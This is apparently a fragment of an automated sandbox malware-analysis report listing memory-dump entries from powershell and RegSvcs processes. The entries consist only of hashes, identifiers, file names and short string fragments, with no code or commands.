                                                                    • Instruction ID: de87c0d17c20372df4886be1ee6710105823abf74f7107f9740e88efb9753d9d
                                                                    • Opcode Fuzzy Hash: f7b784197025fde0e1c1f41fb264ee87d323bcb4f61a4d527f39ad22688a8d80
                                                                    • Instruction Fuzzy Hash: 4F01677111CB0D4FD744EF0CE451AA6B7E0FB95364F10056DE58AC3651D736E892CB45
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.157430775349.00007FF853F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF853F90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff853f90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d6acb716e8119002584d673cc18d414df6c4d78fb37d4a14d156e18a7e59a5e9
                                                                    • Instruction ID: 72764899cfd37f210e6dcee52c4689e6244a5a005036bfa6808dbc7068c37cd4
                                                                    • Opcode Fuzzy Hash: d6acb716e8119002584d673cc18d414df6c4d78fb37d4a14d156e18a7e59a5e9
                                                                    • Instruction Fuzzy Hash: 40F05923F2DD691BF7A5926C34166F466C3EF495B0B4C01B6D40DD3243EC049C044380
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.157430194741.00007FF853EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF853EC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff853ec0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d46f4f4e515f5dd19c659b2c8a09c6290ddf029f5e8c173ad80eea47dbb7c973
                                                                    • Instruction ID: 03f50010e9887c73b63fa77d45959977239750b56a7bb1c385e3fd781fc7cbf8
                                                                    • Opcode Fuzzy Hash: d46f4f4e515f5dd19c659b2c8a09c6290ddf029f5e8c173ad80eea47dbb7c973
                                                                    • Instruction Fuzzy Hash: C3F01775D1460F8BDB01DFA4C4819EEBBF1FB44350F144925D015E6280DA38AA548F80
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.157430194741.00007FF853EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF853EC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff853ec0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2d919a27db84b2a74f80e3376c53181a40a24a8d720e6a07fb1fdfe9ca30fd64
                                                                    • Instruction ID: ae0b8883d859cb9ac452b4867f55dad34d6ddb84f8bdccb4e17adb7dc91236f2
                                                                    • Opcode Fuzzy Hash: 2d919a27db84b2a74f80e3376c53181a40a24a8d720e6a07fb1fdfe9ca30fd64
                                                                    • Instruction Fuzzy Hash: C2E0D811A2C7961FE709FB79045647EAAF29F462A0B0410FED94FC26C3DC2C64198B01
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.157430194741.00007FF853EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF853EC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff853ec0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e1d48d1ff8d7082587831e7a406b34eb3c1619b8831c351a242c584725f089d2
                                                                    • Instruction ID: bc5356299a2eeb645696f6fc59a9c0712627095979c74453f36587ec9f8e95a4
                                                                    • Opcode Fuzzy Hash: e1d48d1ff8d7082587831e7a406b34eb3c1619b8831c351a242c584725f089d2
                                                                    • Instruction Fuzzy Hash: 2BC0C031424131C7C22D4424000107831A7FB04112324103DC483674C2CD392C028700
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.157430194741.00007FF853EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF853EC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff853ec0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f48d64dac8f11c4affb34a931bbf8bec28ebba803c18ac61b769aab995d4ce74
                                                                    • Instruction ID: de7a9258f97bda565eda4b12008dc685e7dc43baad866da4c51ec801740756bc
                                                                    • Opcode Fuzzy Hash: f48d64dac8f11c4affb34a931bbf8bec28ebba803c18ac61b769aab995d4ce74
                                                                    • Instruction Fuzzy Hash: 78612F6291D3C94FE31B5B7458261A67FB1EF43220B0A42EFD0CACB4E3E9181806C762
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.157430194741.00007FF853EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF853EC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff853ec0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a9349d00b36e242d76d619ed3680710f089ecc6623b8e9531ad62e0e3d59269a
                                                                    • Instruction ID: 350b95d8706e2c9c548897d3ddb60cb92782a0d8447ad8457324bfa4faa013db
                                                                    • Opcode Fuzzy Hash: a9349d00b36e242d76d619ed3680710f089ecc6623b8e9531ad62e0e3d59269a
                                                                    • Instruction Fuzzy Hash: 3831426292EBD91FE31A9A744C5E076BFE5EF4326070A01FEC086CB5E3DC58180B8791
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: fGr$ fGr$4'Br
                                                                    • API String ID: 0-1337414937
                                                                    • Opcode ID: 54514612f340305e9ead90b8c246c0f988d365b1920936ed80e9be575b8de1e6
                                                                    • Instruction ID: 7a84386677225e9759435780b220affa82fbcb574ab60a69f4c78bf83b1b4f3d
                                                                    • Opcode Fuzzy Hash: 54514612f340305e9ead90b8c246c0f988d365b1920936ed80e9be575b8de1e6
                                                                    • Instruction Fuzzy Hash: 06F2F535700524CFC746EB25D9B4EAA77F2FB8C700F5187A9D40A9B769DA70AC42CB84
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: fGr$ fGr$4'Br
                                                                    • API String ID: 0-1337414937
                                                                    • Opcode ID: 6ca79bd3aa5d683c7a2820aeaa6b98d6ed04e89573d20f690566c5bca0db1727
                                                                    • Instruction ID: dddbeb4adeb5141bcbe4ebdc456580934c6a8fd0dd3f54a87ad4c273f3113128
                                                                    • Opcode Fuzzy Hash: 6ca79bd3aa5d683c7a2820aeaa6b98d6ed04e89573d20f690566c5bca0db1727
                                                                    • Instruction Fuzzy Hash: 08F2F535700524CFC746EB25D9B4EAA77F2FB8C700F5187A9D40A9B769DA70AC42CB84
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (Fr
                                                                    • API String ID: 0-1611054570
                                                                    • Opcode ID: 30b3433597de4e4ea8377b8aa1a8f3e7bf50375f6ae756199b2fc3c25f2a126f
                                                                    • Instruction ID: 892dde228ece0c92222f84dc9dd32baf523f3cdb0dd0ff9147429aef78f29037
                                                                    • Opcode Fuzzy Hash: 30b3433597de4e4ea8377b8aa1a8f3e7bf50375f6ae756199b2fc3c25f2a126f
                                                                    • Instruction Fuzzy Hash: 2CC1B335B00205DFDB45EFA8D450AAEB7F2FF89300B108669D40ADB755DA31AD06CF91
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 36dc8a974dc81516968de896df6385212350da4bad8354a0c527b015f17111ee
                                                                    • Instruction ID: 38d4d35c512dce26f0e5fefed933fa5e5192801c29152ff8af958d542e42493c
                                                                    • Opcode Fuzzy Hash: 36dc8a974dc81516968de896df6385212350da4bad8354a0c527b015f17111ee
                                                                    • Instruction Fuzzy Hash: 16D12D34B001258FD795FF29D8A8A6E77F2FBC8704F1186A9D4099B399DE709D42CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a1d51dad359da2f55b9feb161cff7f506f734ed5e5fb2bb11ac123ca2568ff70
                                                                    • Instruction ID: 5cfe2f1c0f5e7f0fad21264cfc3e444ebbaa4408f4fed7b4deea4b46b9559ce6
                                                                    • Opcode Fuzzy Hash: a1d51dad359da2f55b9feb161cff7f506f734ed5e5fb2bb11ac123ca2568ff70
                                                                    • Instruction Fuzzy Hash: F8C12F34B001258FD795EF29D8A8A6E77F2FBC8700F1146A9D4099B399DE719D42CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a473f73bf1680c5c5b090da230efeaeceecb8f25db6f62b45160b764df63d01d
                                                                    • Instruction ID: 1eb174e6606eaad5d29ed94a1dc6e33ce3df8bf6ab49c6734fc7ea5fc4067932
                                                                    • Opcode Fuzzy Hash: a473f73bf1680c5c5b090da230efeaeceecb8f25db6f62b45160b764df63d01d
                                                                    • Instruction Fuzzy Hash: 92A14034B001258FD799EF29D4A8A6E77F2FBC8300F1186A9D409DB399DE709D42CB81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HHr$PHBr$PHBr$Fr
                                                                    • API String ID: 0-1758279117
                                                                    • Opcode ID: 1be45377159810841b72eaebdad7c54493b5f87a20d5de64fb65fcb91404bdb9
                                                                    • Instruction ID: 70ad511635bd27d5708529a64a54716aa8e4ed808e1e97e8d5730a2cfbc90cb7
                                                                    • Opcode Fuzzy Hash: 1be45377159810841b72eaebdad7c54493b5f87a20d5de64fb65fcb91404bdb9
                                                                    • Instruction Fuzzy Hash: DD123C30A10706CFDB65DF78C450BAEB7B2EF88304F248A29D4069B391DB75E946CB81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158645412167.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1260000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: TeBr$TeBr$p0@
                                                                    • API String ID: 0-3462956981
                                                                    • Opcode ID: e640d87fd1a5bdce10d9d8be96e16f579d0d33268c18f9ccabae874ad4b03854
                                                                    • Instruction ID: ce37b25bb26ecb08201d569f15c280f71d25e1c644fae77eefc525467d1a2ce9
                                                                    • Opcode Fuzzy Hash: e640d87fd1a5bdce10d9d8be96e16f579d0d33268c18f9ccabae874ad4b03854
                                                                    • Instruction Fuzzy Hash: 4D413A74B10114DFCB44EF68D598AAEBBF6BF8C310F2544A9E506EB3A5DA71AC40CB50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'Br$|>Ir$|>Ir
                                                                    • API String ID: 0-606652922
                                                                    • Opcode ID: e7a5f0d066679f4aad3ad0004538a53db921bc67405e4808db6a773e9077e0bb
                                                                    • Instruction ID: 7a0b4e4b2e1af190f4cdefd8390aeb8a8f9d9edd1d61f7449e96be1f107e2e9a
                                                                    • Opcode Fuzzy Hash: e7a5f0d066679f4aad3ad0004538a53db921bc67405e4808db6a773e9077e0bb
                                                                    • Instruction Fuzzy Hash: 4031B6347103414FD3A2DB68D45065B7BE6AFD9214F18CA69D185CF3D2DB31E90AC792
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @UHr$@UHr
                                                                    • API String ID: 0-1473942880
                                                                    • Opcode ID: d05488d48a3809308029a232fe40ec25457873c237011c1ad66f3db378e6487b
                                                                    • Instruction ID: dc22940ce9bbe82e89e91ca38a107bddca1b28aac360bfc0401583e7f1e13fb2
                                                                    • Opcode Fuzzy Hash: d05488d48a3809308029a232fe40ec25457873c237011c1ad66f3db378e6487b
                                                                    • Instruction Fuzzy Hash: 8322F834A10209CFDB64CFA9C594AADB7B2BF89304F2495A9D505EB362DB31ED42CF50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HHr$PHBr
                                                                    • API String ID: 0-1376763656
                                                                    • Opcode ID: 5aa78a5be0d5d23851e5948c93db6ca11677049dc720f0b611b158461d210f39
                                                                    • Instruction ID: 03ef5c4c9278a13eeaf71e7cfe7041ea7a7ecb07e219cf669e65e4fa39ad7704
                                                                    • Opcode Fuzzy Hash: 5aa78a5be0d5d23851e5948c93db6ca11677049dc720f0b611b158461d210f39
                                                                    • Instruction Fuzzy Hash: 65D14A30A107068FD765DF79C850BAEB7F2EF88314F248A29D4059B791DB71E986CB81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @UHr
                                                                    • API String ID: 0-1452064359
                                                                    • Opcode ID: 801fe71b227583e0385c6d5919257a8131cfc3c278af45150729eac51faa8a86
                                                                    • Instruction ID: a78efa943e6262d64b60bc9dae838b628e8a8ec53af91980186c5b3099e686e8
                                                                    • Opcode Fuzzy Hash: 801fe71b227583e0385c6d5919257a8131cfc3c278af45150729eac51faa8a86
                                                                    • Instruction Fuzzy Hash: 92A12234A10218CFDB64CFA9C594BADBBF2AF89304F2495A9D505EB362DB31E941CF50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: aBr
                                                                    • API String ID: 0-3022515362
                                                                    • Opcode ID: 4428022a2b9e20760eedb2010ff4917a4fba6d5ccfa8dff1fb5c80c5ce5672fb
                                                                    • Instruction ID: 089aeab25d80eac6f0b91d8c4c51d8d674091e0601e5f2fce337d4a249b921b8
                                                                    • Opcode Fuzzy Hash: 4428022a2b9e20760eedb2010ff4917a4fba6d5ccfa8dff1fb5c80c5ce5672fb
                                                                    • Instruction Fuzzy Hash: 62210371A013108FD786EB7994857AE3BA2EFC5310F044659D115DB3C6EB7468068BC2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: aBr
                                                                    • API String ID: 0-3022515362
                                                                    • Opcode ID: 3dd65b60c59eddc04ab8484f5f174ca130c98a3ed1e3f2b932c2dc7cc95d57d8
                                                                    • Instruction ID: ff245c671672c8ed5570880fe72e4735fba2385d90bb8007280acc3541803058
                                                                    • Opcode Fuzzy Hash: 3dd65b60c59eddc04ab8484f5f174ca130c98a3ed1e3f2b932c2dc7cc95d57d8
                                                                    • Instruction Fuzzy Hash: A111B270B102248FE795EF6AD4456AF7BA6EBC4710F108618D5059B384EFB06D068BC6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: TeBr
                                                                    • API String ID: 0-1467184053
                                                                    • Opcode ID: 8d22fc28e0f3f611cecf39f79f2c7439193e5b80ce10ffa581fc05e55ef6e7a4
                                                                    • Instruction ID: 2c98d11bdbb57df0f93443b093325aeeccaaf837cc9876abe1fb9d5352656e88
                                                                    • Opcode Fuzzy Hash: 8d22fc28e0f3f611cecf39f79f2c7439193e5b80ce10ffa581fc05e55ef6e7a4
                                                                    • Instruction Fuzzy Hash: 2611C1707102248FDB25BB64D469BEE3BB2AB88700F15066AD501AB385CEB54C42C7DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: TeBr
                                                                    • API String ID: 0-1467184053
                                                                    • Opcode ID: 5f3ebe2d979cb7e5496259c7512272593a7051fa709e48c30ab67666b281be43
                                                                    • Instruction ID: cbe21fdc5ae24b18c651d2db111074bbace6affe45796f8a44294102ef45fc82
                                                                    • Opcode Fuzzy Hash: 5f3ebe2d979cb7e5496259c7512272593a7051fa709e48c30ab67666b281be43
                                                                    • Instruction Fuzzy Hash: 720180307102288FDB25BB58D429BAE76B2ABC8710F104629D501AB3C4CFB55C42C7DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: aBr
                                                                    • API String ID: 0-3022515362
                                                                    • Opcode ID: 840158f140483d2a83843ac9f023cc419e59603297140cadf8ab937d1ebee232
                                                                    • Instruction ID: c704ec78794aaa7c85ac0b711b7b432f897e2b18af34ee8b685c32002c06cfb8
                                                                    • Opcode Fuzzy Hash: 840158f140483d2a83843ac9f023cc419e59603297140cadf8ab937d1ebee232
                                                                    • Instruction Fuzzy Hash: BEF0A9307503209BE795FB69A4507AE73A2EBC4725F208A18E5069B3C4DEB06C0A87C6
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d1e8aac12a8ed78ba294c0220fbea8e6afb7d657b8483c6ab8674512bb7732c1
                                                                    • Instruction ID: fbff39116200e291c74f71ccef9a2b5416b7a2d32d64d706038d1b27f9a7751c
                                                                    • Opcode Fuzzy Hash: d1e8aac12a8ed78ba294c0220fbea8e6afb7d657b8483c6ab8674512bb7732c1
                                                                    • Instruction Fuzzy Hash: 0641E231B002098FDB55EF68C491AAEB7F6FF89204B10C669D509DB35ADB71AC07CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 266b8ca3cdba95078537bae5a1a25d470fd11fa09ff0ae664d92e250cbbe3bc5
                                                                    • Instruction ID: 443d7485e0adb10450b832fae60a4bb91e06a9734466caad6a2b6d28bb4bf55b
                                                                    • Opcode Fuzzy Hash: 266b8ca3cdba95078537bae5a1a25d470fd11fa09ff0ae664d92e250cbbe3bc5
                                                                    • Instruction Fuzzy Hash: 0441B130B002098FDB55EF68D491AAEB7E6FF89204B10C629D5099B75ADF71AC07CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2571ec9565b407ccb6fa8b2864df65e9ec3cbff94dca10e0ef69d8c54234550a
                                                                    • Instruction ID: 9a3d61e55d05a47a94ecb0ab146ef7dfb1f534bc340893cffdcc033f2b4bc252
                                                                    • Opcode Fuzzy Hash: 2571ec9565b407ccb6fa8b2864df65e9ec3cbff94dca10e0ef69d8c54234550a
                                                                    • Instruction Fuzzy Hash: 19512034B001298FD755EF29D8A8AAE77F2FBC8304F1046A9D409DB359DA759D42CF81
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fac75a9c121b44e67beb7438862add52bbc3aeb60286e316a1f6200b93a5c2e7
                                                                    • Instruction ID: 599d508f1d071bd0ab2f7e46934bf86111a4638c3d542471faa8f8527bb7fedd
                                                                    • Opcode Fuzzy Hash: fac75a9c121b44e67beb7438862add52bbc3aeb60286e316a1f6200b93a5c2e7
                                                                    • Instruction Fuzzy Hash: 09513034B001298FD745EF29D8A8AAE77F2FBC8300F1046A9D409DB399DA759D42CF81
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 12099a61797380340e18b44bc44626d48bb2411f7cfea6e09a4c370438ecdfe9
                                                                    • Instruction ID: 7c18d0d07e5d23da749be4089cc9db40b9fbe0ccded89f0124bba610713cdb9a
                                                                    • Opcode Fuzzy Hash: 12099a61797380340e18b44bc44626d48bb2411f7cfea6e09a4c370438ecdfe9
                                                                    • Instruction Fuzzy Hash: 1541AE30A103468FCB51CF78C890AAEBBF5BF89204B04866AE54ACB751DB30ED45CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a90ee050dc33aa025574df0cc10f26d3c0d6b2e581f4e5ed4bbf872ac56f7b6b
                                                                    • Instruction ID: 2bd39fd0d865d5a9f8e5cb8d379eadf26a784ff92edd9bf699dc4b6c3dbe8318
                                                                    • Opcode Fuzzy Hash: a90ee050dc33aa025574df0cc10f26d3c0d6b2e581f4e5ed4bbf872ac56f7b6b
                                                                    • Instruction Fuzzy Hash: C13125317042449FD755CB68D840AABBBF6FBC9300B198AAAE449CB742DA31E841CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158645412167.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1260000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 019e0ee372c6b7955aad55649bc21cd4f9a0e7b6fc72ee55a6ceaa412262e804
                                                                    • Instruction ID: 89b13aa65f456708dfce052d8d3f7227f1ead650fec53c24a810e4001e50e552
                                                                    • Opcode Fuzzy Hash: 019e0ee372c6b7955aad55649bc21cd4f9a0e7b6fc72ee55a6ceaa412262e804
                                                                    • Instruction Fuzzy Hash: CD2126317163418FE703D73ADC6066A3FEBAF86A1070445AAE581CB3A2EE75DC058761
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158645412167.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1260000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f2f3d9f5d57a2fcf797b9e0735436b1d4ca54822575eec12d6fdb6a8115b66e6
                                                                    • Instruction ID: 52c761dabcda87261424d29aeb83ab2a61d52a0dd5ef1b732f10eb340f4873fa
                                                                    • Opcode Fuzzy Hash: f2f3d9f5d57a2fcf797b9e0735436b1d4ca54822575eec12d6fdb6a8115b66e6
                                                                    • Instruction Fuzzy Hash: A311E3357122118FEB56E73EE894A2B77DBEFC4A607008529EA05CB394FE70DC008790
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fbec82914bdf6102712da46655379121c961c58ce7fd0b8b8af26d70c2ed8a1b
                                                                    • Instruction ID: 05a9a10415ca373ad5d2bbb5994c2b7b8599dc6b34c339f089c0fd65718d8ed6
                                                                    • Opcode Fuzzy Hash: fbec82914bdf6102712da46655379121c961c58ce7fd0b8b8af26d70c2ed8a1b
                                                                    • Instruction Fuzzy Hash: F721AC70A1034A8FCB51CF69C490AAABBF0FF48214F04466AD449DB712D734E946CF91
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3417dfd311703ff695ff4a8ab97ae6364387a50b58dcf20d7beb6f0b9a9eb8b4
                                                                    • Instruction ID: 9adb5e04be14e2dec8a0d9b71d3e5f228e987e1c19524f58ba751b753532052a
                                                                    • Opcode Fuzzy Hash: 3417dfd311703ff695ff4a8ab97ae6364387a50b58dcf20d7beb6f0b9a9eb8b4
                                                                    • Instruction Fuzzy Hash: C7211534610A018FD364DF19D544A9AFBE5EF88324F45CA6AD49ACBBA2C770FC45CB81
                                                                    Memory Dump Source
